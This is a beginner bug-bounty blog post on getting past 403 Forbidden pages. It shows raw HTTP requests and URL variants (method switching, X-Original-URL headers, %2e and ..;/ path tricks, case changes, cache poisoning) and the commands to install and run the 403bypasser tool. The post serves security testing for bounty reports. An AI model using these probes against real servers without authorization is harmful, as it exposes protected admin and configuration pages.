#14 Bypass — 403 Forbidden

Hello to all beginner Bug hunters. This is Uttam Gupta, today I have come with a topic from bypasses — 403 forbidden. A 403 Forbidden Error occurs when you do not have permission to access a web page or something else on a web server. Many times it happens that you are doing bug hunting on your target and while doing you go deep into the target, mostly I also get and you will also get 403 Forbidden or Permission Denied and then most beginners leave it. But if you can bypass it, then you can see most of the time target’s admin page or any trusted page and can do hunting on it. And you can also get bounty rewards by reporting it.

Today I will tell you some manual ways to bypass and also tell about a linux tool how to bypass automatically with its help. So, let's start.

Manually Bypass

Request Method Manipulation: Convert GET request to POST request.

GET /admin HTTP/1.1
Host: target.com

How to apply this

POST /admin HTTP/1.1
Host: target.com

Overriding the Target URL via Non-Standard Headers: X-Original-URL: & X-Rewrite-URL:

GET /admin HTTP/1.1
Host: target.com

How to apply this

GET /anything HTTP/1.1
Host: target.com
X-Original-URL: /admin 
        OR
GET /anything HTTP/1.1
Host: target.com
X-Rewrite-URL: /admin

Appending %2e after the first slash:

http://target.com/admin => 403

How to apply this

http://target.com/%2e/admin => 200

Try add dot (.) slash (/) and semicolon (;) in the URL:

http://target.com/admin => 403

How to apply this

http://target.com/secret/. => 200
http://target.com//secret// => 200
http://target.com/./secret/.. => 200
http://target.com/;/secret => 200
http://target.com/.;/secret => 200
http://target.com//;//secret => 200

Add “..;/” after the directory name:

http://target.com/admin

How to apply this

http://target.com/admin..;/ 

Try to uppercase the alphabet in the URL:

http://target.com/admin

How to apply this

http://target.com/aDmIN

Via Web Cache Poisoning:

GET /anything HTTP/1.1
Host: victim.com
X­-Original-­URL: /admin

Automation Bypass

Tool: 403bypasser

Installation:

1. Clone the repository to your machine. git clone https://github.com/yunemse48/403bypasser.git

2. Install required modules by running the code pip install -r requirements.txt

Click on it for installation in Brief.

https://www.geeksforgeeks.org/403bypasser-bypass-403-restricted-directory/

Usage:

It is very easy to use it. Let’s see

After installation run this command

python3 403bypasser.py -u https://target.com -d xyz

In this command -u is for your targeted URL and -d is for the path which is showing you 403 forbidden and you want to bypass it like admin page, config.php, etc.

Now, Lets see with a live example

You will be able to see how this tool works. These tools do everything one by one — Request Method Manipulation, Path Manipulation, Overriding the Target URL via Non-Standard Headers and Other Headers & Values, etc.

I hope I must have taught you something new again. Thank You for reading this blog. HAVE A NICE DAY AND HAPPY HACKING.

P.S. I am looking for a job, my email is uttamgupta1802@gmail.com.